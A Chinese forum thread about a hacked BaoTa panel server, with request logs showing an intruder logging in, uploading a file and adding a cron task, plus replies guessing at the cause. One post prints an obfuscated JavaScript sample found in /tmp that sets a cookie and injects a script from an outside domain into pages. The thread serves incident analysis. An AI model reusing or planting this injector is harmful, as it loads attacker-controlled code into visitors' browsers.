【宝塔】宝塔被黑登录前的日志

Ricky.D. · 发表于 2023-1-15 01:44:10

老机器，版本7.9.0，先前一直没登录过，今天发现被挂马了，由于垃圾宝塔控评，不打算再和他们反馈了。不知道这些东西有没有帮助。大佬们看看
查看面板请求日志：

: Expected GET method: '\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr\r\n'
89.248.165.7 - - [2023-01-07 01:41:29] "/*àCookie: mstshash=Administr" 400 - 0.000117
: Invalid http version: "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03I\x06²ù¼\x99iÀYûøºe-\x83Ud]\x0e\x8d·b8´gÆÝ9dZ8f gÁ\x81i³öòË°©\x19NÖ½\x95g|püé: Expected GET method: '\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr\r\n'
89.248.165.7 - - [2023-01-09 04:44:19] "/*àCookie: mstshash=Administr" 400 - 0.000135
: Expected GET method: '\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr\r\n'
89.248.165.7 - - [2023-01-09 22:00:15] "/*àCookie: mstshash=Administr" 400 - 0.000161

45.77.23.0 - - [2023-01-09 22:43:29] "GET /后台入口/ HTTP/1.1" 200 44317 0.096781
45.77.23.0 - - [2023-01-09 22:43:29] "POST /login HTTP/1.1" 200 357 0.051574
45.77.23.0 - - [2023-01-09 22:43:30] "GET / HTTP/1.1" 200 7170 0.089844
45.77.23.0 - - [2023-01-09 22:43:30] "POST /ajax?action=ignore_version HTTP/1.1" 200 209 0.002588
45.77.23.0 - - [2023-01-09 22:43:30] "POST /data?action=getData HTTP/1.1" 200 705 0.002852
45.77.23.0 - - [2023-01-09 22:43:32] "POST /system?action=GetNetWork HTTP/1.1" 200 1120 1.042232
45.77.23.0 - - [2023-01-09 22:43:33] "POST /config?action=get_config HTTP/1.1" 200 1274 0.002941
45.77.23.0 - - [2023-01-09 22:43:36] "POST /files?action=upload HTTP/1.1" 200 202 2.926313
45.77.23.0 - - [2023-01-09 22:43:37] "POST /crontab?action=AddCrontab HTTP/1.1" 200 210 0.428736
45.77.23.0 - - [2023-01-09 22:43:37] "POST /crontab?action=StartTask HTTP/1.1" 200 205 0.015275
45.77.23.0 - - [2023-01-09 22:43:40] "POST /crontab?action=DelCrontab HTTP/1.1" 200 201 0.062536
45.77.23.0 - - [2023-01-09 22:43:54] "POST /system?action=ServiceAdmin HTTP/1.1" 200 202 3.345679
45.77.23.0 - - [2023-01-09 22:43:55] "POST /ajax?action=delClose HTTP/1.1" 200 204 0.048389

Ricky.D. · 发表于 2023-1-15 01:45:15

本帖最后由 Ricky.D. 于 2023-1-15 01:47 编辑

先排除xss，之前没有查看过站点日志
其次，国内机器，腾讯云特供版

Ricky.D. · 发表于 2023-1-15 01:58:36

/www/server/panel/logs/upgrade_polkit.log

Loaded plugins: fastestmirror, langpacks
Repository epel is listed more than once in the configuration
Loading mirror speeds from cached hostfile
* centos-sclo-rh: mirror.sfo12.us.leaseweb.net
* centos-sclo-sclo: centos.mirror.shastacoe.net
No packages marked for update
[2023-01-15 01:40:16] - 修复失败,请手动执行命令: yum -y update polkit

tail /tmp/systemd-private-56d86f7d8382402517f3b5-不知道是啥
var _0xafac=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2E\x64\x6F\x75\x62\x6C\x65\x63\x6C\x69\x63\x6B\x73\x2E\x62\x69\x7A\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x75\x61\x2F\x6C\x69\x6E\x6B\x69\x64\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0xc588x2,_0xc588x3,_0xc588x4){var _0xc588x5= new Date();_0xc588x5[_0xafac[1]](_0xc588x5[_0xafac[0]]()+ _0xc588x4);document[_0xafac[2]]= _0xc588x2+ _0xafac[3]+ _0xc588x3+ _0xafac[4]+ _0xc588x5[_0xafac[5]]()}setc(_0xafac[6],_0xafac[7],360);document[_0xafac[9]](unescape(_0xafac[8]));

6056687 · 发表于 2023-1-15 02:14:33

帮顶

/**
* Linux常用命令：sed '/ *#/d; /^$/d' example.txt 从example.txt文件中删除所有注释和空白行
* 我一直都在你身边，一直都在
* Link https://greasyfork.org/zh-CN/scripts/396933-hostloc-zsbd
*/

sunlight · 发表于 2023-1-15 02:49:50

搜了一下好像只是在扫其他漏洞
我觉得这洞这么值钱，怎么可能不把日志删干净再挂马?

dua · 发表于 2023-1-15 02:57:38

本帖最后由 dua 于 2023-1-15 02:58 编辑

這個看起來是用了系統漏洞你系統有更新過嗎?

Ricky.D. · 发表于 2023-1-15 12:52:32

sunlight 发表于 2023-1-15 02:49
搜了一下好像只是在扫其他漏洞
我觉得这洞这么值钱，怎么可能不把日志删干净再挂马? ...

删了呀，但是没删运行日志，而且他直接登录后台了

		自动登录	找回密码
密码			注册